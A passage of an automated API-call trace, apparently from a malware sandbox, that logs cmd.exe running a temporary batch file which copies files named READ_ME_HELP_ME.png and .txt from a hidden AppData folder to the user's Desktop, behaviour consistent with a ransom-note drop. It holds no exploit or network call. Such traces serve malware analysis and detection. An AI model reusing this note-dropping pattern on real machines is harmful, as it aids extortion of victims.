lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n") returned 84 [0037.111] GetFileType (hFile=0x80) returned 0x1 [0037.111] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.111] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0037.112] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.112] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0037.113] _tell (_FileHandle=3) returned 1626 [0037.113] _close (_FileHandle=3) returned 0 [0037.113] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.113] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.113] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.113] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.113] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.113] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.113] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.114] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.115] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.115] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png")) returned 0x20 [0037.115] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.115] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", fInfoLevelId=0x1, lpFindFileData=0xd174b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd174b0) returned 0xd27150 [0037.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", lpFilePart=0x0) returned 0x30 [0037.115] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="con") returned -53 [0037.115] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.115] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.115] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.115] GetFileType (hFile=0x8c) returned 0x1 [0037.116] SetErrorMode (uMode=0x0) returned 0x0 [0037.116] SetErrorMode (uMode=0x1) returned 0x0 [0037.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", lpFilePart=0xc8e294*="READ_ME_HELP_ME.png") returned 0x43 [0037.116] SetErrorMode (uMode=0x0) returned 0x1 [0037.116] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.116] SetErrorMode (uMode=0x0) returned 0x0 [0037.116] SetErrorMode (uMode=0x1) returned 0x0 [0037.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", lpFilePart=0xc8de64*="READ_ME_HELP_ME.png") returned 0x30 [0037.116] SetErrorMode (uMode=0x0) returned 0x1 [0037.116] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png") returned -3 [0037.116] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.png")) returned 0xffffffff [0037.116] GetLastError () returned 0x2 [0037.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", lpFilePart=0x0) returned 0x30 [0037.116] SetErrorMode (uMode=0x0) returned 0x0 [0037.116] SetErrorMode (uMode=0x1) returned 0x0 [0037.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", lpFilePart=0xc8de64*="READ_ME_HELP_ME.png") returned 0x30 [0037.116] SetErrorMode (uMode=0x0) returned 0x1 [0037.116] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png") returned -3 [0037.116] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.png")) returned 0xffffffff [0037.116] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.png"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.120] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\read_me_help_me.png")) returned 0x20 [0037.120] SetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\READ_ME_HELP_ME.png", dwFileAttributes=0x20) returned 1 [0037.121] _close (_FileHandle=3) returned 0 [0037.121] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.121] GetFileType (hFile=0xffffffff) returned 0x0 [0037.121] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.121] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.121] FindNextFileW (in: hFindFile=0xd27150, lpFindFileData=0xd174b0 | out: lpFindFileData=0xd174b0) returned 0 [0037.121] GetLastError () returned 0x12 [0037.121] FindClose (in: hFindFile=0xd27150 | out: hFindFile=0xd27150) returned 1 [0037.121] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.121] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.121] GetFileType (hFile=0x28) returned 0x2 [0037.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.122] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.122] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.122] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.122] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.122] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.123] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.123] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.123] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.123] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.123] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.123] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.123] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.123] SetConsoleInputExeNameW () returned 0x1 [0037.123] GetConsoleOutputCP () returned 0x1b5 [0037.124] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.124] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.124] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.124] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.124] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.124] SetFilePointer (in: hFile=0x80, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0037.124] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.124] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0037.124] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x414, lpOverlapped=0x0) returned 1 [0037.124] SetFilePointer (in: hFile=0x80, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0037.124] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0037.124] GetFileType (hFile=0x80) returned 0x1 [0037.124] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.124] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0037.125] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.125] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0037.126] _tell (_FileHandle=3) returned 1710 [0037.126] _close (_FileHandle=3) returned 0 [0037.126] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.126] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.126] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.126] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.126] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.126] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.126] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.126] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.126] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.127] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) 